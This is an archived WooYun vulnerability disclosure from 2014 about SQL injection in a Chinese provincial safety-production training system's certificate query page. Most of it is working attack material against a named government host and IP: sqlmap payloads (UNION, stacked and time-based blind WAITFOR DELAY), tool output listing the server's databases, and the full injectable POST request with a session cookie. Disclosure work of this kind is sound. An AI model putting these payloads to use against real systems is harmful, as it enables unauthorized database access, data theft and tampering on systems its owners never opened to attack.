乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-10-11: 细节已通知厂商并且等待厂商处理中 2014-10-16: 厂商已经确认,细节仅向厂商公开 2014-10-26: 细节向核心白帽子及相关领域专家公开 2014-11-05: 细节向普通白帽子公开 2014-11-15: 细节向实习白帽子公开 2014-11-25: 细节向公众公开
某省安全生产培训系统SQL注入
访问http://exam.hebsafety.gov.cn/###存在证书查询地址http://110.249.219.99:7700/RS22/pub/pubQuery.jsp此地址输入内容存在注入payload
Parameter: #1* Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: read_only=1&actionType=&StudentId=&QualificationTypeCode=&AssessmentNature=&showBase=&showTrain=&showExam=&showCert=&StudentName=111' UNION ALL SELECT CHAR(113)+CHAR(101)+CHAR(106)+CHAR(108)+CHAR(113)+CHAR(85)+CHAR(109)+CHAR(83)+CHAR(107)+CHAR(83)+CHAR(78)+CHAR(89)+CHAR(111)+CHAR(104)+CHAR(104)+CHAR(113)+CHAR(97)+CHAR(100)+CHAR(121)+CHAR(113)-- &IDNumber=111&DiplomaNumber=11 Vector: UNION ALL SELECT [QUERY]-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: read_only=1&actionType=&StudentId=&QualificationTypeCode=&AssessmentNature=&showBase=&showTrain=&showExam=&showCert=&StudentName=111'; WAITFOR DELAY '0:0:5'--&IDNumber=111&DiplomaNumber=11 Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: read_only=1&actionType=&StudentId=&QualificationTypeCode=&AssessmentNature=&showBase=&showTrain=&showExam=&showCert=&StudentName=111' WAITFOR DELAY '0:0:5'--&IDNumber=111&DiplomaNumber=11 Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'-----there were multiple injection points, please select the one to use for following injections:[0] place: (custom) POST, parameter: #2*, type: Single quoted string (default)[1] place: (custom) POST, parameter: #1*, type: Single quoted string[q] Quit> 1[10:05:15] [INFO] the back-end DBMS is Microsoft SQL Serverweb application technology: JSPback-end DBMS: Microsoft SQL Server 2008[10:05:15] [INFO] fetching database names[10:05:15] [INFO] the SQL query used returns 8 entries[10:05:15] [DEBUG] performed 0 queries in 0.30 secondsavailable databases [8]:[*] master[*] model[*] msdb[*] pxks_tb[*] ReportServer[*] ReportServerTempDB[*] RS22[*] tempdb
发送的数据包
POST /RS22/trainExam/pubPerson!doPubQuery.action HTTP/1.1Host: 110.249.219.99:7700Proxy-Connection: keep-aliveContent-Length: 163Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://110.249.219.99:7700User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.149 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://110.249.219.99:7700/RS22/trainExam/pubPerson!pubQuery.actionAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=F8EFA60E22D72F310BF52BA4AF3C7D8Bread_only=1&actionType=&StudentId=&QualificationTypeCode=&AssessmentNature=&showBase=&showTrain=&showExam=&showCert=&StudentName=aaa*&IDNumber=aaa*&DiplomaNumber=aaa*
未授权所以未深入,wooyun危害,有数据库脱裤修改数据风险
华夏明科(北京)数字技术有限公司
危害等级:高
漏洞Rank:11
确认时间:2014-10-16 09:05
暂无